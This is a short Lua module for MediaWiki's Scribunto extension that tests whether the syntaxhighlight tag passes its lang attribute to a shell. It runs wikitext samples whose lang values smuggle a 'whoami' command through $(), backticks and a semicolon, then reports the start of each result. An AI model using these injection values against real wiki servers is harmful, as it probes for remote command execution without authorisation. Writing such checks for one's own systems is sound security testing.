模块:SstiSyntax
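--- Scribunto module that checks how the syntaxhighlight tag handles its
-- `lang` attribute when the value contains shell metacharacters.
--
-- Each sample below differs from the baseline only in the `lang` value (or in
-- using the literal tag form instead of {{#tag:}}). The samples are passed to
-- the parent frame's preprocess() and the start of each result is reported.
-- A highlighter that treats `lang` purely as data is expected to give the
-- same kind of result for every row as for "baseline"; any row that differs
-- deserves investigation on the server side.
local p = {}

-- Maximum number of bytes of each result kept in the report.
local MAX_REPORT_LEN = 60

-- { label, wikitext } pairs; the wikitext strings are passed through verbatim.
local SAMPLES = {
  {"baseline", "{{#tag:syntaxhighlight|TEST_CODE|lang=python}}"},
  {"cmd_sub", "{{#tag:syntaxhighlight|TEST_CODE|lang=$(whoami 2>&1)}}"},
  {"backtick", "{{#tag:syntaxhighlight|TEST_CODE|lang=`whoami 2>&1`}}"},
  {"semicolon", "{{#tag:syntaxhighlight|TEST_CODE|lang=python;whoami 2>&1;echo}}"},
  {"syntaxhighlight_tag", "<syntaxhighlight lang=\"$(whoami 2>&1)\">TEST_CODE</syntaxhighlight>"},
}

--- Run every sample through the parent frame and summarise the results.
-- @param frame Scribunto frame object; only frame:getParent() is used.
-- @treturn string "no_parent" when there is no parent frame or it has no
--   preprocess function; otherwise "label=result" entries joined by " | ",
--   each result cut to MAX_REPORT_LEN bytes. A result prefixed with
--   "error: " means preprocess() raised instead of returning.
function p.test(frame)
  local parent = frame:getParent()
  if not parent or not parent.preprocess then
    return "no_parent"
  end

  local results = {}
  for _, sample in ipairs(SAMPLES) do
    local label, wikitext = sample[1], sample[2]
    -- pcall keeps one failing sample from aborting the whole run.
    local ok, out = pcall(parent.preprocess, parent, wikitext)
    local shown = tostring(out):sub(1, MAX_REPORT_LEN)
    if not ok then
      -- Previously a raised error was indistinguishable from returned text;
      -- mark it so a parser failure is not mistaken for rendered output.
      shown = "error: " .. shown
    end
    -- NOTE(review): whether the string returned by preprocess() holds the
    -- tag's rendered output or only a parser placeholder is not visible
    -- here; confirm before reading anything into a row.
    results[#results + 1] = label .. "=" .. shown
  end
  return table.concat(results, " | ")
end

return p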